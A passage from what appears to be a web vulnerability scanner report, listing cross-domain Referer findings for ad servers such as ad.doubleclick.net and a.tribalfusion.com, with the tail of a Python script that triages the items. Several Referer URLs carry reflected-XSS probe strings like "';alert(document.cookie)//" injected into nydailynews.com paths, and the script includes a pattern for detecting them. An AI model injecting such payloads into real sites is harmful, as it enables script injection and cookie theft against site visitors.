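    ref_host = (urlsplit(referer).hostname or "") if referer else ""

    parts = status_line.split()
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None

    return {
        "request_line": req_line,
        "host": host,
        "referer_host": ref_host,
        # A Referer from another host or site means that third party learns the referring URL.
        "cross_host_referer": bool(ref_host) and ref_host != host,
        "cross_site_referer": bool(ref_host) and site_of(ref_host) != site_of(host),
        # Percent-decode first so "'%3balert(1)//" is matched as "';alert(1)//".
        "referer_carries_probe": bool(PROBE_RE.search(unquote(referer))),
        "status": status,
        "no_store": "no-store" in resp_h.get("cache-control", "").lower(),
    }


# Trimmed copy of item 27.18 (path and cookie shortened by the editor).
ITEM_27_18 = """Request

GET /p.media/TRIMMED/2401306/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Cookie: ANON_ID=TRIMMED

Response

HTTP/1.1 200 OK
X-Function: 102
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Content-Length: 390

<IFRAME src="http://a.tribalfusion.com/p.media/TRIMMED/2401306/adTag.html">
...[SNIP]...
"""

# Trimmed copy of item 27.10: no Referer, 404 response.
ITEM_27_10 = """Request

GET /p.media/TRIMMED/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Connection: close
Cookie: ANON_ID=TRIMMED;

Response

HTTP/1.1 404 Not Found
X-Function: 413
Content-Type: text/html
Content-Length: 140

<html><head><title>404 Not Found</title></head>
"""

if __name__ == "__main__":
    for item in (ITEM_27_18, ITEM_27_10):
        print(triage(item))
```

Run against a whole report, the interesting rows are those with `cross_site_referer` and `referer_carries_probe` both true: the probe is the crawler's own reflection marker, so its presence in a Referer sent to a third party tells you which injected first-party URL the browser was on when the ad request fired, while `status` and `no_store` separate live ad responses from the dead 404 paths that make up most of the trailing-slash variants above.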

27.19. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Request

GET /p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 342

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX
...[SNIP]...

27.20. http://ad.doubleclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /

Request

GET / HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-HttpSvr
Content-Type: text/html
Content-Length: 1175
Last-Modified: Fri, 12 Oct 2007 16:17:37 GMT
Date: Fri, 28 Jan 2011 16:43:21 GMT
Connection: close

<html>
<body bgcolor=#ffffff>
<b>This is a DoubleClick advertising server.</b>
<p><center>
<a href="http://www.doubleclick.com">
Click here for the DoubleClick home page.</a>
<p>
<a href="http:
...[SNIP]...

27.21. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3093.130430.MINDSETMEDIA/B4053191

Request

GET /adi/N3093.130430.MINDSETMEDIA/B4053191;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/c%3B234739680%3B0-0%3B0%3B58581955%3B4307-300/250%3B39068367/39086124/1%3Bu%3D%2Cuol-70184290_1296254387%2C11d765b6a10b1b3%2Cent%2Cmm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B~sscs%3D%3f;ord=1656403? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 22:39:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1143

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/197/%2a/
...[SNIP]...

27.22. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.CentroNetwork/B5159652.2

Request

GET /adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6328

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

27.23. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5112048

Request

GET /adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...

27.24. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.TribalFusion.com/B5132291.17

Request

GET /adi/N3740.TribalFusion.com/B5132291.17;sz=728x90;click=http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=1186282371? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 16:41:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5415

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...

27.25. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.10

Request

GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:14:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5295

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...

27.26. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.5

Request

GET /adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5221

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...

27.27. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...

27.28. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5215

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...

27.29. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Tribal_Fusion/B5094437.2

Request

GET /adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6204

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

27.30. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.5

Request

GET /adi/N4319.MSNMEN/B3889285.5;sz=160x600;;sz=160x600;ord=106131971?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095575.198102272/267856416/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856416/direct;wi.160;hi.600/01/0.7152271461673081?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 13:39:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/w;
...[SNIP]...

27.31. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.6

Request

GET /adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=164770402?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095574.198102269/267856421/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856421/direct;wi.728;hi.90/01/0.9115818275604397?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:23:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 503

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/n;
...[SNIP]...

27.32. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.7

Request

GET /adi/N4319.MSNMEN/B3889285.7;sz=300x250;;sz=300x250;ord=180294417?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095571.198102267/267856417/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
